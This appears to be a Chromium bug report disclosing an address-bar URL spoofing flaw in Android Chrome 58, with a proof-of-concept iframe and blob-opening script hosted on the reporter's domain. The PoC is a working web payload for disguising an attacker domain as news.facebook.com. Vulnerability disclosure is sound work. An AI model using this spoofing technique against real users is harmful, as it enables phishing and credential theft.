VULNERABILITY DETAILS
I think this Bug might be different from  issue 646278  and issue 721184. In Android phones, the Chrome address bar has limited visual display space, and an attacker can target a multi-level domain name, such as news.facebook.com.xisigr.com. When the user opens, the spoof domain name(news.facebook.com) will appear in the address bar, and the real domain name (xisigr.com) will be hidden . Of course, the length of the spoof domain name is limited by the size of the user's phone screen, but in targeted attacks, this domain name spoofing is feasible.

VERSION
Chrome Version: [58.0.3029.83] + [stable]
Operating System: [Android]

REPRODUCTION CASE

This POC is written on the basis of my test phone screen size, just to prove the feasibility of the attack.

(1) Open http://xisigr.com/test/spoof/chrome/blob_click.html in Android Chrome 

----blob_click.html---

<iframe src="http://news.facebook.com.xisigr.com/test/spoof/chrome/blob_3.html" frameborder="0" noresize="noresize"></iframe>

----blob_click.html---

(2) Click the button "Click me"

----blob_3.html---

<script>
var bb = function(){
      args = ['<h1>spoofing</h1>'];
      b = new Blob(args, {type: 'text/html'});
      window.open(URL.createObjectURL(b));
};
</script>
<a href="javascritp:void(0)" onclick='bb()'><h1>Click me</h1></a>

----blob_3.html---

 

Deleted: blob_click.html 125 bytes

blob_click.html 125 bytes View Download

Deleted: blob_3.html 241 bytes

blob_3.html 241 bytes View Download

Deleted: spoof.png 26.5 KB

	spoof.png 26.5 KB View Download

Deleted: spoof.m4v 6.2 MB

spoof.m4v 6.2 MB Download